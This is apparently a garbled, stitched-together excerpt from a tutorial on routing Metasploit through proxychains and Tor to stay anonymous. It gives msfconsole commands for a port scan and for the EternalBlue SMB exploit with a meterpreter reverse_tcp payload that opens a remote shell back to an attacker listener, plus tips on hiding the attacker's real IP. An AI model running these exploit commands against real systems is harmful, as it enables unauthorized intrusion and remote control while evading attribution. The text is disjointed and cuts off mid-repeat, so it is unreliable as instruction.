msf6 > use auxiliary/scanner/portscan/tcp msf6 > set RHOSTS 203.0.113.10 msf6 > set PORTS 1-1000 msf6 > set THREADS 10 msf6 > run Every SYN/ACK packet is wrapped in a TCP stream through your proxies. The target sees only the exit proxy IP. msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 192.168.1.100 # An internal IP reachable only via proxy msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > set LHOST 203.0.113.50 # Your listener IP (must be reachable via proxy chain or direct) msf6 > exploit Critical Note: The reverse_tcp payload will cause the target to directly call back to your LHOST . If your LHOST is your real IP, you've just de-anonymized yourself.
Install and start Tor:
socks5 10.0.0.15 1080 socks5 172.16.1.20 1080 High risk of logging/hijacking. Use only in lab environments. Step 2: Verify the Proxy Chain Works Before launching Metasploit, test the chain with a simple tool: metasploit with proxychains
sudo proxychains4 msfconsole ProxyChains needs to bind to privileged ports (under 1024) for certain modules, and raw packet operations often require root. If your LHOST is your real IP, you've